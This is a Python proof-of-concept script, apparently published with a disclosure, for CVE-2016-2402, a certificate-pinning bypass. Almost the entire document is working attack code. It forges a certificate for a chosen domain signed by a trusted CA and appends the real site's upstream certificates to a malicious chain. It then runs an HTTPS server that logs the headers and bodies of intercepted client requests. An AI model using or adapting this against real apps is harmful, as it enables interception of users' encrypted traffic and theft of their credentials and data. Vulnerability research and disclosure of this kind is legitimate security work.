README.md
Rendering markdown...
#!/usr/bin/python3
# John Kozyrakis
import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl
import argparse
import logging
import os
import sys
from OpenSSL import crypto, SSL
import socket
class ServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.debug("intercepted GET request. If you see data from the client here, the attack worked.")
self.log_request()
logging.debug(self.headers)
def do_POST(self):
logging.debug("")
logging.debug(
"intercepted POST request to %s. If you see data from the client here, the attack worked." % self.path)
self.log_request()
if "tracking" not in self.path:
logging.debug(self.headers)
length = int(self.headers['Content-Length'])
content = self.rfile.read(length)
logging.debug(content)
def gen_malicious_chain(domain):
# load CA certificate and key
trusted_ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM,
open(os.path.join(os.path.dirname(__file__), CA_CERT)).read())
trusted_ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM,
open(os.path.join(os.path.dirname(__file__), CA_KEY)).read())
# generate a new end-entity certificate for a given domain signed by our trusted CA
[(end_entity_cert, end_entity_key)] = generate_end_entity_cert(domain, trusted_ca_cert, trusted_ca_key)
tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, end_entity_cert))
tempMaliciousChainFile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, end_entity_key))
logging.debug("Generated end-entity cert & key, signed by the provided CA. Adding these to the malicious chain")
upstream_certs = get_upstream_certs(domain, 443)
logging.info("Retrieved the certificates used by the real %s (%s in total)" % (domain, len(upstream_certs)))
if args.mode == 'attack':
for cert in upstream_certs:
tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
logging.info("The upstream certificates WILL be added to the malicious client chain")
else:
logging.info("The upstream certificates will NOT be added to the malicious client chain")
def generate_end_entity_cert(domain, cacert, cakey):
skey = crypto.PKey()
skey.generate_key(crypto.TYPE_RSA, 2048)
scert = crypto.X509()
scert.get_subject().CN = domain # This is where the domain fits
scert.set_issuer(cacert.get_subject())
scert.gmtime_adj_notBefore(0)
scert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
scert.set_serial_number(0)
scert.set_pubkey(skey)
scert.sign(cakey, "sha1")
return [(scert, skey)]
def get_upstream_certs(host, port):
context = SSL.Context(SSL.SSLv23_METHOD)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection = SSL.Connection(context, s)
connection.connect((host, port))
try:
connection.do_handshake()
except SSL.WantReadError:
logging.error("Timeout")
cleanup()
return connection.get_peer_cert_chain()
def cleanup():
tempMaliciousChainFile.close()
logging.error("Exiting")
sys.exit(1)
logging.basicConfig(level=logging.DEBUG)
logging.info("Certificate Pinning bypass POC - CVE-2016-2402 - https://koz.io/pinning-cve-2016-2402")
parser = argparse.ArgumentParser(
prog='Certificate Pinning bypass POC',
description='''This utility will set up a HTTPS server that uses a malicious certificate chain for a specific domain.
If traffic of a vulnerable app is redirected to this server, certificate pinning for that domain will bypassed.
See https://koz.io/pinning-cve-2016-2402 for more details.''',
epilog='''@ikoz - John Kozyrakis''')
parser.add_argument("-d", "--domain", help="Domain name to be intercepted", required=True)
parser.add_argument("-p", "--port", help="Web server port number", type=int, default=443)
parser.add_argument("-c", "--cacert", help="CA certificate that the host system trusts (PEM)", default="CA_CERT.pem")
parser.add_argument("-k", "--cakey", help="Private key of CA that the host system trusts (PEM)", default="CA_KEY.pem")
parser.add_argument("-m", "--mode", help="Add upstream certificates to chain (or not)",
choices=['attack', 'no-attack'], required=True)
parser.add_argument("-v", "--verbose", help="increase output verbosity",
action="store_true")
args = parser.parse_args()
logging.info("Will intercept domain %s" % args.domain)
logging.info("Will use CA certificate %s with private key %s" % (args.cacert, args.cakey))
CA_CERT = args.cacert # certificate of CA that the host system trusts
CA_KEY = args.cakey # private key of CA that the host system trusts
if os.path.isfile(CA_CERT) is False:
logging.error("CA_CERT %s is not a valid file" % CA_CERT)
cleanup()
if os.path.isfile(CA_KEY) is False:
logging.error("CA_KEY %s is not a valid file" % CA_KEY)
cleanup()
tempMaliciousChainFile = tempfile.NamedTemporaryFile()
gen_malicious_chain(args.domain)
logging.info(
"Starting web server - listening at port %s. Redirecting traffic for %s to this server will bypass any pinning and "
"show the requests here" % (
args.port, args.domain))
logging.info("Use Ctrl+C to stop the server")
try:
httpd = HTTPServer(("localhost", args.port), ServerHandler)
except PermissionError:
logging.error("PermissionError: Cannot start server on port %s. Please use sudo or a port >1024" % args.port)
cleanup()
except:
logging.exception("Exception")
cleanup()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=tempMaliciousChainFile.name, server_side=True)
httpd.serve_forever()